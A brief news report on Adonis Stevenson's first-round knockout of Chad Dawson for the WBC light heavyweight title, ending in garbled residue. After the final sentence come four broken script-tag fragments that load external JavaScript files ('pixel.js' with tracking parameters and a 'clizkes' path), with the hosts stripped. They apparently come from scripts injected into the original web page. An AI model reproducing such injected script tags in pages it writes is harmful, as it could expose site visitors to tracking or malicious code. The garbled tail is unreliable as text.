Adonis Stevenson stopped Chad Dawson with a left hook in the first round to take the WBC light heavyweight title Saturday night.

Stevenson (21-1), from nearby Longueuil, sent a crushing left to Dawson’s temple less than 2 minutes into the scheduled 12-round bout. Dawson (31-3-0) got up, but referee Richard Griffin stopped the fight.

According to ESPN Stats & Information, Stevenson joined four-division world champion Roy Jones Jr. as the only fighters to win the light heavyweight title with a first-round knockout. Jones did it against Montell Griffin in August 1997, avenging his first professional defeat.

Stevenson became the only Canadian to currently hold a world title. – Dawson, took the title last year from Bernard Hopkins.# src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://land.#/clizkes’ type=’text/javascript’># src=’https://#/clizkes’ type=’text/javascript’>
